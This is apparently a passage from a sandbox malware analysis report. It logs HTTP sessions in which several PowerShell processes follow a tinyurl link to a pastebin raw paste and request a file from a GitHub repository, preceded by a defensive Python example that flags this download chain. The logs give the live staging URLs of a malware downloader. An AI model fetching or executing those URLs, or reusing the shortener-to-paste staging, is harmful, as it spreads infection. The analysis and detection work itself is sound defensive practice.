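The domain list above and the HTTP sessions that follow show the delivery chain a detection engineer wants to pull out of such a capture automatically: several powershell.exe processes fetch a tinyurl.com link over plain HTTP (port 80), are redirected with a 301 to a pastebin.com raw paste, and separately request a raw.githubusercontent.com file, again over plain HTTP, which GitHub answers with a 301 to the https URL. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses trimmed copies of the exchanges logged below (same PIDs and ports as in the report), rebuilds the redirect hops and tags each session with the traits worth alerting on. The host lists, the finding names and the `suspicious` rule are the example's own assumptions.

```python
# Added example (not from the Joe Sandbox report or the sample): rebuild the
# PowerShell download chain from HTTP exchanges like those logged below and
# flag the traits a detection engineer would alert on.
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlsplit

# Assumption: site-specific lists of legitimate services that downloaders
# abuse as a redirection layer (shorteners) or as a payload/config host.
SHORTENER_HOSTS = {"tinyurl.com", "bit.ly", "is.gd", "t.ly"}
PASTE_HOSTS = {"pastebin.com", "raw.githubusercontent.com", "gist.githubusercontent.com"}


@dataclass
class HttpSession:
    pid: int
    scheme: str            # "http" for destination port 80, "https" for 443
    host: str
    path: str
    user_agent: str
    status: int
    location: Optional[str]
    findings: List[str] = field(default_factory=list)

    @property
    def url(self) -> str:
        return f"{self.scheme}://{self.host}{self.path}"


def _headers(lines):
    """Lower-cased header name -> value for the lines after a start line."""
    return {k.strip().lower(): v.strip()
            for k, v in (ln.split(":", 1) for ln in lines if ":" in ln)}


def parse_session(pid: int, dst_port: int, raw: str) -> HttpSession:
    """Parse one 'request, blank line, response' exchange as the sandbox logs it."""
    request, _, response = raw.replace("\r\n", "\n").strip().partition("\n\n")
    req_lines, resp_lines = request.split("\n"), response.split("\n")
    req, resp = _headers(req_lines[1:]), _headers(resp_lines[1:])
    return HttpSession(pid=pid, scheme="https" if dst_port == 443 else "http",
                       host=req.get("host", ""), path=req_lines[0].split(" ")[1],
                       user_agent=req.get("user-agent", ""),
                       status=int(resp_lines[0].split(" ")[1]),
                       location=resp.get("location"))


def analyse(sessions: List[HttpSession]) -> List[str]:
    """Annotate each session's findings in place; return the distinct redirect hops."""
    pids_per_url = {}
    for s in sessions:
        pids_per_url.setdefault(s.url, set()).add(s.pid)
    hops = []
    for s in sessions:
        s.findings = []
        if "WindowsPowerShell/" in s.user_agent:
            s.findings.append("powershell-user-agent")
        if s.scheme == "http":          # the script asked for http://, not https://
            s.findings.append("cleartext-http")
        if s.host in SHORTENER_HOSTS:
            s.findings.append("url-shortener")
        if s.host in PASTE_HOSTS:
            s.findings.append("paste-or-raw-code-host")
        if 300 <= s.status < 400 and s.location:
            if urlsplit(s.location).hostname in PASTE_HOSTS:
                s.findings.append("redirects-to-paste-host")
            hop = f"{s.url} -> {s.location}"
            if hop not in hops:
                hops.append(hop)
        if len(pids_per_url[s.url]) > 1:   # several processes pulling the same stage
            s.findings.append(f"same-url-from-{len(pids_per_url[s.url])}-pids")
    return hops


def suspicious(s: HttpSession) -> bool:
    """Alert rule: a scripting-host user agent reaching a shortener or paste host."""
    f = set(s.findings)
    return "powershell-user-agent" in f and bool(
        f & {"url-shortener", "paste-or-raw-code-host", "redirects-to-paste-host"})


# Constructed input: the two exchanges logged in this report, trimmed to the
# headers the analysis needs.
TINYURL_EXCHANGE = """GET /yeykydun HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tinyurl.com

HTTP/1.1 301 Moved Permanently
Location: https://pastebin.com/raw/sA04Mwk2
"""
GITHUB_EXCHANGE = """GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com

HTTP/1.1 301 Moved Permanently
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
"""


def run_example():
    sessions = [parse_session(pid, 80, raw) for pid, raw in
                [(4040, TINYURL_EXCHANGE), (2536, TINYURL_EXCHANGE), (2992, TINYURL_EXCHANGE),
                 (2536, GITHUB_EXCHANGE), (2992, GITHUB_EXCHANGE)]]
    return sessions, analyse(sessions)
```

Run against the five exchanges, `analyse` yields two hops (`http://tinyurl.com/yeykydun -> https://pastebin.com/raw/sA04Mwk2` and the plain-HTTP raw.githubusercontent.com URL redirecting to its https form) and every session carries `powershell-user-agent`, `cleartext-http` and a paste-site or shortener tag, so `suspicious` fires on all of them. The `cleartext-http` tag matters on its own: a downloader that builds its stage URLs as `http://` leaves the redirect and the Location header visible to any proxy or IDS on the path, which is exactly where the Suricata alert noted at the top of this report came from.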
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49727 | 104.17.112.233 | 80 | 4040 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:59:57.469630957 CEST | 164 | OUT | GET /yeykydun HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tinyurl.com
Connection: Keep-Alive
Oct 15, 2024 15:59:58.097490072 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:59:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://pastebin.com/raw/sA04Mwk2
Referrer-Policy: unsafe-url
X-Robots-Tag: noindex
X-TinyURL-Redirect-Type: redirect
Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
CF-Cache-Status: HIT
Age: 393
Set-Cookie: __cf_bm=I2mt2P6JL.NlKMqjoWgJYP36VSX1.U7kT9XKgDSBXp8-1729000798-1.0.1.1-oL7um6T_cpN2qhmI6zgFYr9NsNDhA_zz6JuMQmyYbeL5YifwQ4VBks3XxbeDpcCZZuL0eA2i.Ezm2V0eC8BgCw; path=/; expires=Tue, 15-Oct-24 14:29:58 GMT; domain=.tinyurl.com; HttpOnly
Server: cloudflare
CF-RAY: 8d30552b8e396b3d-DFW
alt-svc: h3=":443"; ma=86400
Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
Oct 15, 2024 15:59:58.097503901 CEST | 256 | IN | Data Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49728 | 104.17.112.233 | 80 | 2536 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:59:57.470742941 CEST | 164 | OUT | GET /yeykydun HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tinyurl.com
Connection: Keep-Alive
Oct 15, 2024 15:59:58.095881939 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:59:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://pastebin.com/raw/sA04Mwk2
Referrer-Policy: unsafe-url
X-Robots-Tag: noindex
X-TinyURL-Redirect-Type: redirect
Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
CF-Cache-Status: HIT
Age: 393
Set-Cookie: __cf_bm=L.1rAnFPcPJl4IPBnDbWON0YoygdPHBvnLbgZhAbhkI-1729000798-1.0.1.1-TIgp5a.7OaaozbfpUG9o3ulD.nUARwF1XbdLbPkvqKp_MJW_Wlhh3sV_r7f4LwTwgSwmMvs7KSTDFLLGzxT7YA; path=/; expires=Tue, 15-Oct-24 14:29:58 GMT; domain=.tinyurl.com; HttpOnly
Server: cloudflare
CF-RAY: 8d30552b9b55e71a-DFW
alt-svc: h3=":443"; ma=86400
Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
Oct 15, 2024 15:59:58.095921993 CEST | 256 | IN | Data Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49729 | 104.17.112.233 | 80 | 2992 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:59:57.470959902 CEST | 164 | OUT | GET /yeykydun HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tinyurl.com
Connection: Keep-Alive
Oct 15, 2024 15:59:58.098251104 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:59:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://pastebin.com/raw/sA04Mwk2
Referrer-Policy: unsafe-url
X-Robots-Tag: noindex
X-TinyURL-Redirect-Type: redirect
Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
CF-Cache-Status: HIT
Age: 393
Set-Cookie: __cf_bm=xYxSBqxSCGX0azfzEcAu.rQUHw5MjYMxydf0ubtWPYc-1729000798-1.0.1.1-DeV2XvkelIjrOb3TOvbVk7qbXyM7xdDgZzlRw4TUPaaNCFOLPWy0TMala7G7IM3dZq0bmvAILMkyniQzCScChQ; path=/; expires=Tue, 15-Oct-24 14:29:58 GMT; domain=.tinyurl.com; HttpOnly
Server: cloudflare
CF-RAY: 8d30552b982828d5-DFW
alt-svc: h3=":443"; ma=86400
Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
Oct 15, 2024 15:59:58.098274946 CEST | 256 | IN | Data Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49742 | 185.199.109.133 | 80 | 2536 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:59:59.153279066 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:59:59.900347948 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:59:59 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210060-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000800.690036,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 14:04:59 GMT
Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49743 | 185.199.109.133 | 80 | 2992 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:59:59.153501987 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:59:59.900305986 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:59:59 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210025-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000800.688348,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 14:04:59 GMT
Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49746 | 104.17.112.233 | 80 | 1396 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:59:59.308444977 CEST | 164 | OUT | GET /yeykydun HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: tinyurl.com
Connection: Keep-Alive
Oct 15, 2024 15:59:59.934580088 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:59:59 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://pastebin.com/raw/sA04Mwk2
Referrer-Policy: unsafe-url
X-Robots-Tag: noindex
X-TinyURL-Redirect-Type: redirect
Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
X-TinyURL-Redirect: eyJpdiI6IkI1L1JYKzBkc1dSbWFSRU9OcVg4eVE9PSIsInZhbHVlIjoiZU9EV0xyMnM0NVFXUEdrYXIxQ3VtYndVK2JJdk1oRDY2Z1F5UjBtbXRsS1hrTnhMcXRpb0NEN21lOU1zYUlVMm1zWTZyeGNiRGcxUUEyZ3pPd0REbFE9PSIsIm1hYyI6ImQxMDA2OTAwMTgzM2YwNTk3NWE0MDc1ZjkwOThmODY3NGUyOTEzMmI2YTQ0YWNlZmI3ZTZkYWY2YjQ1ODk2NzMiLCJ0YWciOiIifQ==
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
CF-Cache-Status: HIT
Age: 394
Set-Cookie: __cf_bm=0Eyl_qBHLCzv83JYLFaxOK_DQbsBCUFFHhj2iEsh.8U-1729000799-1.0.1.1-glv4sEC3cDZCjzBUWba6taxQzxfuMcnHcvOejHnBnCruNyHTJCkYGwv.D.7geHcXBI8oFocYzM51ya9EO2k97g; path=/; expires=Tue, 15-Oct-24 14:29:59 GMT; domain=.tinyurl.com; HttpOnly
Server: cloudflare
CF-RAY: 8d3055371d316bc6-DFW
alt-svc: h3=":443"; ma=86400
Data Raw: 31 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 70 61 73
Data Ascii: 17a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://pas
Oct 15, 2024 15:59:59.934639931 CEST | 256 | IN | Data Raw: 74 65 62 69 6e 2e 63 6f 6d 2f 72 61 77 2f 73 41 30 34 4d 77 6b 32 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 61 73 74 65 62 69 6e 2e 63 6f 6d 2f 72 61
Data Ascii: tebin.com/raw/sA04Mwk2'" /> <title>Redirecting to https://pastebin.com/raw/sA04Mwk2</title> </head> <body> Redirecting to <a href="https://pastebin.com/raw/sA04Mwk2">https://pastebin.com/raw/sA04Mwk2</a>. </body><


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49747 | 185.199.109.133 | 80 | 4040 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:59:59.461673021 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 16:00:00.057195902 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:59:59 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120029-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000800.993274,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 14:04:59 GMT
Vary: Authorization,Accept-Encoding


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.6 | 49757 | 185.199.109.133 | 80 | 1396 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Oct 15, 2024 16:00:00.743700981 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:01.335105896 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:01 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120080-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000801.270939,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:05:01 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.6 | 49881 | 172.67.19.24 | 80 | 2248 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Oct 15, 2024 16:00:23.747190952 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:24.372405052 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 14:00:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Tue, 15 Oct 2024 15:00:24 GMT
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Server: cloudflare
                                                            CF-RAY: 8d3055cfd90ee7b3-DFW
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.6 | 49894 | 185.199.109.133 | 80 | 2248 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Oct 15, 2024 16:00:25.237832069 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: raw.githubusercontent.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:26.832339048 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120081-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000826.775566,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:05:25 GMT
                                                            Vary: Authorization,Accept-Encoding
                                                            Oct 15, 2024 16:00:26.833522081 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120081-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000826.775566,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:05:25 GMT
                                                            Vary: Authorization,Accept-Encoding
                                                            Oct 15, 2024 16:00:26.834574938 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                                            Connection: close
                                                            Content-Length: 0
                                                            Server: Varnish
                                                            Retry-After: 0
                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                            Accept-Ranges: bytes
                                                            Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                            Via: 1.1 varnish
                                                            X-Served-By: cache-dfw-kdal2120081-DFW
                                                            X-Cache: HIT
                                                            X-Cache-Hits: 0
                                                            X-Timer: S1729000826.775566,VS0,VE0
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Expires: Tue, 15 Oct 2024 14:05:25 GMT
                                                            Vary: Authorization,Accept-Encoding


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.6 | 49926 | 172.67.19.24 | 80 | 3780 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Oct 15, 2024 16:00:31.882006884 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Oct 15, 2024 16:00:32.495598078 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 15 Oct 2024 14:00:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Tue, 15 Oct 2024 15:00:32 GMT
                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                            Server: cloudflare
                                                            CF-RAY: 8d305602aaea6c55-DFW
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


